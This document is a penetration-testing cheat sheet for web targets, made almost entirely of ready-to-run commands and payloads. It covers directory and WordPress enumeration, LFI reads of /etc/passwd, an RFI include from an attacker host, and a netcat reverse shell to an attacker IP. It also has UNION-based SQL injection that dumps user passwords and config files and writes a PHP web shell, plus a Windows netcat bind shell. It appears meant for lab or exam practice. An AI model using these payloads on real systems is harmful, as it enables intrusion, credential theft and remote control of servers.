HTTP Enumeration
----------------------------------------------
# Gobuster
gobuster -u <targetip> -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
----------------------------------------------
# nikto
nikto -h <targetip>
----------------------------------------------
# curl
curl -v -X OPTIONS http://<targetip>/test/
curl --upload-file <file name> -v --url <url> -0 --http1.0
----------------------------------------------
# LFI
# PHP Wrapper
php://filter/convert.base64-encode/resource=index.php
# Null Byte (historical: only affects PHP versions before 5.3.4, which reject paths containing NUL)
?page=../../../../../../etc/passwd%00
----------------------------------------------
# RFI
?page=http://attackerserver.com/evil.txt
----------------------------------------------
# Command Execution
<?php system('ls -la');?>
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attackerip> 1234 >/tmp/f');?>
---------------------------------------------
# LFI and RCE
# Inject code execution
<?php echo system($_REQUEST["cmd"]);?>
# Go to LFI vuln and
?=…….&cmd=ls
----------------------------------------------
# SQL Injection (manual)
photoalbum.php?id=1'
# find the number of columns
photoalbum.php?id=1 order by 8
# Find space to output db
?id=1 union select 1,2,3,4,5,6,7,8
# Get username of the sql-user
?id=1 union select 1,2,3,4,user(),6,7,8
# Get version
?id=1 union select 1,2,3,4,version(),6,7,8
# Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables
# Get all columns from a specific table
?id=1 union select 1,2,3, column_name ,5,6,7,8 from information_schema.columns where table_name=‘users’
?id=1 union select 1,2,3, group_concat(column_name) ,5,6,7,8 from information_schema.columns() where table_name=‘users’
.. 1,2,3, group_concat(user_id, 0x3a, first_name, 0x3a, last_name, 0x3a, email, 0x3a, pass, 0x3a, user_level) ,5,6,7,8 from users
# view files
' union select 1,2,3, load_file(‘/etc/passwd’) ,5,6,7,8 -- -
' union select 1,2,3, load_file(‘/var/www/login.php’) ,5,6,7,8 -- -
' union select 1,2,3, load_file(‘/var/www/includes/config.inc.php’) ,5,6,7,8 -- -
' union select 1,2,3, load_file(‘/var/www/mysqli_connect.php’) ,5,6,7,8 -- -
# upload files
' union select 1,2,3, 'this is a test message' ,5,6,7,8 into outfile '/var/www/test'-- -
' union select 1,2,3, load_file('/var/www/test') ,5,6,7,8 -- -
' union select null,null,null, "<?php system($_GET['cmd']) ?>" ,5,6,7,8 into outfile '/var/www/shell.php' -- -
' union select null,null,null, load_file('/var/www/shell.php') ,5,6,7,8 -- -
----------------------------------------------
# wordpress
wpscan --url http://.... --log
wpscan --url http://... --enumerate u --log
wpscan --url http://<targetip> --wordlist wordlist.txt --username example_username
http://....../wp-admin
http://...../wp-content/uploads/2017/10/file.png
----------------------------------------------
# Windows Command Execution (RFI exploit)
# Connect via netcat to the target (nc -nv <IP> <PORT>) and send
<?php echo shell_exec("nc.exe -nlvp 4444 -C:\Windows\System32\cmd.exe");?>
# on kali call the shell
nc -nv 10.11.25.59 4444